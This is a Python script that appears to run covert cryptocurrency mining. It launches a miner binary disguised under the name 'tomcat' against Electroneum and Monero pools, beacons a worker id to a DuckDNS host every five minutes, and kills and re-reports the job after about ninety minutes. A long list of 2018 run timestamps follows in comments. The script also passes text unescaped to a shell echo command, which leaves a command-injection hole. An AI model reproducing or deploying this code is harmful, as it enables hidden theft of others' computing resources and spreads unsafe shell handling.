import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:06.146784
#2018-02-17 15:54:01.279415
#2018-02-17 17:41:05.419385
#2018-02-17 19:28:04.167230
#2018-02-17 21:19:04.884768
#2018-02-17 23:03:01.773040
#2018-02-18 00:50:06.697084
#2018-02-18 02:38:04.353147
#2018-02-18 04:26:05.985637
#2018-02-18 06:18:02.067288
#2018-02-18 08:07:04.301957
#2018-02-18 09:54:02.040609
#2018-02-18 11:41:01.723556
#2018-02-18 13:26:01.932039
#2018-02-18 15:16:04.575730
#2018-02-18 17:05:07.535151
#2018-02-18 18:52:01.274249
#2018-02-18 20:38:06.768958
#2018-02-18 22:24:06.116083
#2018-02-19 00:13:06.375431
#2018-02-19 02:01:01.683822
#2018-02-19 03:47:06.663219
#2018-02-19 05:31:05.873751
#2018-02-19 07:19:07.061862
#2018-02-19 09:07:08.005399
#2018-02-19 10:58:02.135424
#2018-02-19 12:47:06.088254
#2018-02-19 14:34:08.513804
#2018-02-19 16:22:06.143292
#2018-02-19 18:08:07.377522
#2018-02-19 19:55:08.064960
#2018-02-19 21:44:04.605141
#2018-02-19 23:32:07.274037
#2018-02-20 01:19:01.495389
#2018-02-20 03:08:01.580035
#2018-02-20 04:55:07.364599
#2018-02-20 06:38:01.406645
#2018-02-20 08:23:04.426430
#2018-02-20 10:08:03.911871
#2018-02-20 11:52:07.651196
#2018-02-20 13:41:08.193342
#2018-02-20 15:24:09.241610
#2018-02-20 17:11:05.766066
#2018-02-20 18:59:07.966939
#2018-02-20 20:48:07.017645
#2018-02-20 22:34:06.310656
#2018-02-21 00:15:04.349367
#2018-02-21 02:03:02.200583
#2018-02-21 03:51:04.276760
#2018-02-21 05:39:07.627745
#2018-02-21 07:28:04.291284
#2018-02-21 09:12:08.207126
#2018-02-21 11:01:06.434374
#2018-02-21 12:47:10.257223
#2018-02-21 14:35:04.079364
#2018-02-21 16:21:09.299471
#2018-02-21 18:13:10.050586
#2018-02-21 19:59:04.086590
#2018-02-21 21:46:09.252312
#2018-02-21 23:38:07.419884
#2018-02-22 01:27:05.876977
#2018-02-22 03:16:02.134834
#2018-02-22 05:02:08.023868
#2018-02-22 06:45:05.994746
#2018-02-22 08:34:06.108731
#2018-02-22 10:21:07.868349
#2018-02-22 12:06:02.227135
#2018-02-22 13:50:10.203414
#2018-02-22 15:39:01.983558
#2018-02-22 17:24:09.104197
#2018-02-22 19:13:09.675338
#2018-02-22 21:04:07.039022
#2018-02-22 22:48:08.049613
#2018-02-23 00:34:05.904649
#2018-02-23 02:21:07.919107
#2018-02-23 04:11:01.920274
#2018-02-23 05:55:05.490921
#2018-02-23 07:35:07.959935
#2018-02-23 09:38:06.539552
#2018-02-23 11:42:09.734297
#2018-02-23 13:33:01.724949
#2018-02-23 15:18:06.618930
#2018-02-23 17:05:11.513593
#2018-02-23 18:53:01.928487
#2018-02-23 20:39:05.677282
#2018-02-23 22:26:01.314384
#2018-02-24 00:13:01.927934
#2018-02-24 02:04:06.103659
#2018-02-24 03:55:06.606655
#2018-02-24 05:40:08.775588
#2018-02-24 07:29:05.458120
#2018-02-24 09:16:05.341002
#2018-02-24 11:09:06.014210
#2018-02-24 12:57:05.009949
#2018-02-24 14:45:08.021543
#2018-02-24 16:37:06.615841
#2018-02-24 18:26:04.057526
#2018-02-24 20:13:04.250197
#2018-02-24 22:02:01.505264
#2018-02-25 01:00:05.201455
#2018-02-25 03:56:01.926197
#2018-02-25 06:40:08.498417
#2018-02-25 11:36:02.204123
#2018-02-25 13:23:01.209247
#2018-02-25 14:56:01.732107